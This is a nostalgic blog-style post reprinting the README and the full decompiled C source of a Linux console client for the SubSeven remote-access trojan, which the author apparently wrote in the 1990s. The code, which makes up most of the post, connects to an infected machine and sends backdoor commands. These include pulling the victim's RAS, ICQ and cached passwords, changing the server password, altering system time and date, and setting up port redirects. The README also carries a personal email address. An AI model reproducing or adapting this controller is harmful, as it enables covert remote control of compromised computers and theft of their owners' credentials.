Fucking amazing! When I was a kid I reverse engineered the sub seven trojan horse.
I wrote a fucking client for it but it was lost until my friend Chris sent me a binary. Holy shit.
I’ve decompiled the binary. For some reason as a cracker back in the 90s I only distributed a fucking binary. This isn’t the last version but it’s proof. Thank you Jesus I thought this was lost forever. Hilarious.
README
This is what I wrote as a kid back in the day…God they were great times.
This is a beta version of the linux subseven client. Well you know the
deal, this program is for educational purposese only and I, "haxworx", its
host or the file's host can take no responsibilty by the damage caused or
the laws, treatys, arms and legs broken by the use of this program.
Well, there is no guide to using it, if you can't use it, then, go use the
winblows or X version of the client, we all know the reasons for a console
client...
I recommend using the server that is distrobuted with this file as it is
the full server with all commands/options/plugins and general shite
enabled. If you get into trouble, email me, but if its trivial i won't
respond, bug reports I will do and gratefully at that!
Anyway hope you have fun, oh...I almost forgot, my email is
bryanrpoole@lineone.net. Also check out our site: http://www.haxworx.com.
Laters, Netstar.
c0d3
#include <defs.h>
//-------------------------------------------------------------------------
// Function declarations
void init_proc(void); // idb
void sub_80485C0();
// int __stdcall __register_frame_info(_DWORD, _DWORD); weak
// char *inet_ntoa(struct in_addr in);
// int __stdcall __deregister_frame_info(_DWORD); weak
// char *fgets(char *s, int n, FILE *stream);
// char *strstr(const char *haystack, const char *needle);
// size_t strlen(const char *s);
// in_addr_t inet_addr(const char *cp);
// int __cdecl __libc_start_main(int (__cdecl *main)(int, char **, char **), int argc, char **ubp_av, void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void *stack_end);
// int printf(const char *format, ...);
// struct hostent *gethostbyname(const char *name);
// void exit(int status);
// int atoi(const char *nptr);
// void free(void *ptr);
// ssize_t send(int fd, const void *buf, size_t n, int flags);
// uint16_t htons(uint16_t hostshort);
// void *memset(void *s, int c, size_t n);
// int connect(int fd, const struct sockaddr *addr, socklen_t len);
// ssize_t recv(int fd, void *buf, size_t n, int flags);
// int sprintf(char *s, const char *format, ...);
// int socket(int domain, int type, int protocol);
// ssize_t read(int fd, void *buf, size_t nbytes);
// char *strcpy(char *dest, const char *src);
// void __usercall __noreturn start(int a1@<eax>, void (*a2)(void)@<edx>);
void _do_global_dtors_aux();
void fini_dummy();
int (__stdcall *frame_dummy())(_DWORD, _DWORD);
void init_dummy();
int __cdecl main(int argc, const char **argv, const char **envp);
void __noreturn usage();
void *__cdecl send_command(int fd);
void *__cdecl get_header(int fd);
void *__cdecl read_input(int a1, int fd);
int exitmessage();
int about();
int __cdecl helper(int a1);
int _do_global_ctors_aux();
void init_dummy_0();
void term_proc(void); // idb
//-------------------------------------------------------------------------
// Data declarations
_UNKNOWN unk_8049E43; // weak
int *p_2 = &_DTOR_END__; // weak
int completed_3 = 0; // weak
_UNKNOWN force_to_data; // weak
int _CTOR_LIST__ = -1; // weak
FILE *stdin; // idb
_UNKNOWN object_8; // weak
void *password; // idb
char readit[1024]; // idb
char input[128]; // idb
char command[128]; // idb
int i; // weak
// extern _UNKNOWN _gmon_start__; weak
//----- (08048590) --------------------------------------------------------
void init_proc(void)
{
if ( &_gmon_start__ )
MEMORY[0]();
frame_dummy();
_do_global_ctors_aux();
}
//----- (080485C0) --------------------------------------------------------
void sub_80485C0()
{
JUMPOUT(0);
}
// 80485C6: control flows out of bounds to 0
//----- (08048730) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
void __usercall __noreturn start(int a1@<eax>, void (*a2)(void)@<edx>)
{
int v2; // esi
int v3; // [esp-4h] [ebp-4h] BYREF
char *retaddr; // [esp+0h] [ebp+0h] BYREF
v2 = v3;
v3 = a1;
__libc_start_main((int (__cdecl *)(int, char **, char **))main, v2, &retaddr, init_proc, term_proc, a2, &v3);
__halt();
}
// 8048733: positive sp value 4 has been found
//----- (08048760) --------------------------------------------------------
void _do_global_dtors_aux()
{
void (**v0)(void); // eax
if ( !completed_3 )
{
while ( 1 )
{
v0 = (void (**)(void))p_2;
if ( !*p_2 )
break;
++p_2;
(*v0)();
}
if ( __deregister_frame_info )
__deregister_frame_info(&force_to_data);
completed_3 = 1;
}
}
// 80485F0: using guessed type int __stdcall __deregister_frame_info(_DWORD);
// 804B45C: using guessed type int *p_2;
// 804B460: using guessed type int completed_3;
//----- (080487A8) --------------------------------------------------------
void fini_dummy()
{
;
}
//----- (080487B0) --------------------------------------------------------
int (__stdcall *frame_dummy())(_DWORD, _DWORD)
{
int (__stdcall *result)(_DWORD, _DWORD); // eax
result = __register_frame_info;
if ( __register_frame_info )
return (int (__stdcall *)(_DWORD, _DWORD))__register_frame_info(&force_to_data, &object_8);
return result;
}
// 80485D0: using guessed type int __stdcall __register_frame_info(_DWORD, _DWORD);
//----- (080487D0) --------------------------------------------------------
void init_dummy()
{
;
}
//----- (080487E0) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
char *v3; // eax
int v4; // eax
int result; // eax
int v6[264]; // [esp+8h] [ebp-4BCh] BYREF
struct hostent *v7; // [esp+428h] [ebp-9Ch]
struct sockaddr s; // [esp+42Ch] [ebp-98h] BYREF
char dest[128]; // [esp+43Ch] [ebp-88h] BYREF
int v10; // [esp+4BCh] [ebp-8h]
int fd; // [esp+4C0h] [ebp-4h]
qmemcpy(v6, "shutdown", sizeof(v6));
if ( argc <= 2 )
usage();
v7 = gethostbyname(argv[1]);
if ( !v7 )
{
printf("error: hostname\n");
exit(1);
}
v3 = inet_ntoa((struct in_addr)(*(struct in_addr **)v7->h_addr_list)->s_addr);
strcpy(dest, v3);
v4 = socket(2, 1, 0);
fd = v4;
if ( v4 < 0 )
{
printf("error: socket\n");
exit(1);
}
v10 = atoi(argv[2]);
memset(&password, 0, sizeof(password));
password = (void *)argv[3];
memset(&s, 0, sizeof(s));
s.sa_family = 2;
*(_WORD *)s.sa_data = htons(v10);
*(_DWORD *)&s.sa_data[2] = inet_addr(dest);
if ( connect(fd, &s, 0x10u) )
return printf("error: connect\n");
printf("\nConnection Accepted.\n");
get_header(fd);
printf("Enter 'help' for help.\n\n");
do
{
read_input((int)v6, fd);
send_command(fd);
result = (int)strstr(input, "quit");
}
while ( !result );
return result;
}
//----- (080489BC) --------------------------------------------------------
void __noreturn usage()
{
printf("Usage: sub7 <address> <port> [password]\n");
exit(1);
}
//----- (080489D8) --------------------------------------------------------
void *__cdecl send_command(int fd)
{
int v2; // [esp+0h] [ebp-404h]
char buf[1024]; // [esp+4h] [ebp-400h] BYREF
v2 = 1;
memset(readit, 0, sizeof(readit));
if ( strlen(command) )
{
sprintf(command, "%s\r\n", command);
send(fd, command, 0x80u, 0);
recv(fd, readit, 0x400u, 0);
if ( strstr(command, "listplugins") )
{
if ( strstr(readit, "[RPL]041") )
{
printf("\nNo plugins installed.\n\n");
}
else
{
send(fd, &unk_8049E43, 1u, 0);
recv(fd, buf, 0x400u, 0);
memset(command, 0, sizeof(command));
printf("\n%s\n", buf);
memset(buf, 0, sizeof(buf));
}
v2 = 0;
}
if ( strstr(readit, "[RPL]082") )
v2 = 0;
if ( strstr(readit, "[RPL]001") )
{
printf("\nThe command you requested has not yet been enabled in\n");
printf("this version of the remote server, its not your fault!\n\n");
v2 = 0;
}
if ( strstr(readit, "[RPL]045") )
{
printf("\nThis server does not have the correct plugin installed\n");
printf("either upload the required plugins or upgrade the server.\n\n");
v2 = 0;
}
if ( v2 == 1 )
printf("\n%s\n", readit);
}
memset(readit, 0, sizeof(readit));
return memset(command, 0, sizeof(command));
}
//----- (08048BF8) --------------------------------------------------------
void *__cdecl get_header(int fd)
{
size_t v1; // eax
char s[128]; // [esp+0h] [ebp-180h] BYREF
char buf[256]; // [esp+80h] [ebp-100h] BYREF
if ( password )
{
send(fd, &unk_8049E43, 1u, 0);
read(fd, buf, 0x100u);
memset(buf, 0, sizeof(buf));
sprintf(s, "password %s\r\n", (const char *)password);
v1 = strlen(s);
send(fd, s, v1, 0);
}
read(fd, buf, 0x100u);
if ( strstr(buf, "RPL") )
{
printf("\nInvalid Server Password...quitting.\n\n");
free(password);
exit(1);
}
if ( !strstr(buf, "server") )
{
printf("\nUnrecognised Server Type...quitting.\n\n");
free(password);
exit(1);
}
free(password);
printf("\n%s", buf);
return memset(buf, 0, sizeof(buf));
}
//----- (08048D6C) --------------------------------------------------------
void *__cdecl read_input(int a1, int fd)
{
void *result; // eax
size_t v3; // eax
size_t v4; // eax
size_t v5; // eax
size_t v6; // eax
size_t v7; // eax
size_t v8; // eax
size_t v9; // eax
unsigned int j; // [esp+0h] [ebp-1804h]
unsigned int k; // [esp+0h] [ebp-1804h]
unsigned int m; // [esp+0h] [ebp-1804h]
char v13[80]; // [esp+4h] [ebp-1800h] BYREF
char v14[80]; // [esp+54h] [ebp-17B0h] BYREF
char v15[80]; // [esp+A4h] [ebp-1760h] BYREF
char v16[80]; // [esp+F4h] [ebp-1710h] BYREF
char v17[80]; // [esp+144h] [ebp-16C0h] BYREF
char v18[80]; // [esp+194h] [ebp-1670h] BYREF
char v19[80]; // [esp+1E4h] [ebp-1620h] BYREF
char v20[80]; // [esp+234h] [ebp-15D0h] BYREF
char v21[1024]; // [esp+284h] [ebp-1580h] BYREF
char v22[1024]; // [esp+684h] [ebp-1180h] BYREF
char v23[1024]; // [esp+A84h] [ebp-D80h] BYREF
char v24[80]; // [esp+E84h] [ebp-980h] BYREF
char v25[80]; // [esp+ED4h] [ebp-930h] BYREF
char v26[80]; // [esp+F24h] [ebp-8E0h] BYREF
unsigned int i; // [esp+F74h] [ebp-890h]
char s[128]; // [esp+F78h] [ebp-88Ch] BYREF
char buf[2056]; // [esp+FF8h] [ebp-80Ch] BYREF
int v30; // [esp+1800h] [ebp-4h]
v30 = 0;
printf("SubSeven> ");
memset(input, 0, sizeof(input));
fgets(input, 128, stdin);
for ( ::i = 0; ::i <= 21; ++::i )
{
if ( strstr(input, (const char *)(a1 + 48 * ::i)) )
{
sprintf(command, "%s", (const char *)(a1 + 48 * ::i + 16));
v30 = 1;
}
}
if ( strstr(input, "quit") )
{
result = (void *)exitmessage();
v30 = 1;
}
else if ( strstr(input, "about") )
{
result = (void *)about();
v30 = 1;
}
else if ( strstr(input, "changepw") )
{
printf("\nENTER NEW PASSWORD : ");
fgets(s, 128, stdin);
sprintf(buf, "ChangePass %s\r\n", s);
v3 = strlen(buf);
send(fd, buf, v3, 0);
memset(buf, 0, sizeof(buf));
result = (void *)printf("\nPassword Succesfully Updated!\n\n");
v30 = 1;
}
else if ( strstr(input, "getpasswords") )
{
sprintf(v26, "getraspasswords\r\n");
v4 = strlen(v26);
send(fd, v26, v4, 0);
read(fd, v23, 0x400u);
for ( i = 0; ; ++i )
{
v5 = strlen(v23);
if ( i >= v5 )
break;
if ( v23[i] == 124 )
v23[i] = 10;
}
printf("\nPASSWORDS");
printf("\n----------------------------------------------\n");
printf("\n%s", v23);
printf("----------------------------------------------\n");
sprintf(v25, "geticqpasswords\r\n");
v6 = strlen(v25);
send(fd, v25, v6, 0);
read(fd, v22, 0x400u);
for ( i = 0; ; ++i )
{
v7 = strlen(v22);
if ( i >= v7 )
break;
if ( v22[i] == 124 )
v22[i] = 10;
}
printf("%s\n", v22);
printf("----------------------------------------------\n");
sprintf(v24, "getcachedpasswords\r\n");
v8 = strlen(v24);
send(fd, v24, v8, 0);
read(fd, v21, 0x400u);
for ( i = 0; ; ++i )
{
v9 = strlen(v21);
if ( i >= v9 )
break;
if ( v21[i] == 124 )
v21[i] = 10;
}
printf("%s", v21);
printf("----------------------------------------------\n");
printf("END OF PASSWORDS\n\n");
memset(v26, 0, sizeof(v26));
memset(v25, 0, sizeof(v25));
memset(v24, 0, sizeof(v24));
memset(v23, 0, sizeof(v23));
memset(v22, 0, sizeof(v22));
result = memset(v21, 0, sizeof(v21));
v30 = 1;
}
else if ( strstr(input, "changetime") )
{
printf("\nInput Hour : ");
fgets(v20, 80, stdin);
for ( ::i = 0; (unsigned int)::i <= 0x4F; ++::i )
{
if ( v20[::i] == 10 )
v20[::i] = 0;
}
printf("Input Minute : ");
fgets(v19, 80, stdin);
for ( ::i = 0; (unsigned int)::i <= 0x4F; ++::i )
{
if ( v19[::i] == 10 )
v19[::i] = 0;
}
sprintf(command, "SetTime %s:%s\r\n", v20, v19);
memset(v20, 0, sizeof(v20));
result = memset(v19, 0, sizeof(v19));
v30 = 1;
}
else if ( strstr(input, "changedate") )
{
printf("\nInput Year : ");
fgets(v18, 80, stdin);
for ( ::i = 0; (unsigned int)::i <= 0x4F; ++::i )
{
if ( v18[::i] == 10 )
v18[::i] = 0;
}
printf("Input Month : ");
fgets(v16, 80, stdin);
for ( ::i = 0; (unsigned int)::i <= 0x4F; ++::i )
{
if ( v16[::i] == 10 )
v16[::i] = 0;
}
printf("Input Day : ");
fgets(v17, 80, stdin);
for ( ::i = 0; (unsigned int)::i <= 0x4F; ++::i )
{
if ( v17[::i] == 10 )
v17[::i] = 0;
}
sprintf(command, "SetDate %s:%s:%s\r\n", v18, v16, v17);
memset(v18, 0, sizeof(v18));
memset(v16, 0, sizeof(v16));
result = memset(v17, 0, sizeof(v17));
v30 = 1;
}
else if ( strstr(input, "portredirect") )
{
printf("\nInput Port : ");
fgets(v15, 80, stdin);
for ( j = 0; j <= 0x4F; ++j )
{
if ( v15[j] == 10 )
v15[j] = 0;
}
printf("Output Host/Ip : ");
fgets(v13, 80, stdin);
for ( k = 0; k <= 0x4F; ++k )
{
if ( v13[k] == 10 )
v13[k] = 0;
}
printf("Output Port : ");
fgets(v14, 80, stdin);
for ( m = 0; m <= 0x4F; ++m )
;
sprintf(command, "SetPortRedirect %s %s %s", v15, v13, v14);
memset(command, 0, sizeof(command));
memset(v15, 0, sizeof(v15));
memset(v13, 0, sizeof(v13));
result = memset(v14, 0, sizeof(v14));
v30 = 1;
}
else if ( strstr(input, "stopredirect") )
{
result = (void *)sprintf(command, "RemovePortRedirect");
v30 = 1;
}
else
{
result = strstr(input, "help");
if ( result )
{
result = (void *)helper(a1);
v30 = 1;
}
}
if ( !v30 )
{
printf("\nCommand not found, 'help' for help.\n\n");
return memset(command, 0, sizeof(command));
}
return result;
}
// 804BAC0: using guessed type int i;
// 8048D6C: using guessed type char var_D80[1024];
// 8048D6C: using guessed type char var_1180[1024];
// 8048D6C: using guessed type char var_1580[1024];
// 8048D6C: using guessed type char var_15D0[80];
// 8048D6C: using guessed type char var_1620[80];
// 8048D6C: using guessed type char var_1670[80];
// 8048D6C: using guessed type char var_1710[80];
// 8048D6C: using guessed type char var_16C0[80];
// 8048D6C: using guessed type char var_1760[80];
// 8048D6C: using guessed type char var_1800[80];
//----- (08049808) --------------------------------------------------------
int exitmessage()
{
return printf("\nFor questions or comments, visit http://www.haxworx.com\n\n");
}
//----- (0804981C) --------------------------------------------------------
int about()
{
printf("\nSub7 Unix Console Client (Delta).\n");
return printf("Visit us for updates and information at http://www.haxworx.com.\n\n");
}
//----- (0804983C) --------------------------------------------------------
int __cdecl helper(int a1)
{
int v2; // [esp+0h] [ebp-4h]
v2 = 0;
printf("\nType 'quit' to quit at any time.\n\n");
for ( i = 0; i <= 21; ++i )
{
if ( ++v2 == 6 )
{
printf("\n");
v2 = 0;
}
printf("%s ", (const char *)(a1 + 48 * i));
}
printf("portredirect\nstopredirect changedate changetime changepw");
printf(" getpasswords about ");
return printf("\n\n");
}
// 804BAC0: using guessed type int i;
//----- (080498F0) --------------------------------------------------------
int _do_global_ctors_aux()
{
int (**v0)(void); // ebx
int result; // eax
v0 = (int (**)(void))&_CTOR_LIST__;
if ( _CTOR_LIST__ != -1 )
{
do
result = (*v0--)();
while ( *v0 != (int (*)(void))-1 );
}
return result;
}
// 804B468: using guessed type int _CTOR_LIST__;
//----- (08049914) --------------------------------------------------------
void init_dummy_0()
{
;
}
//----- (0804991C) --------------------------------------------------------
void term_proc(void)
{
_do_global_dtors_aux();
}
// nfuncs=62 queued=18 decompiled=18 lumina nreq=0 worse=0 better=0
// ALL OK, 18 function(s) have been successfully decompiled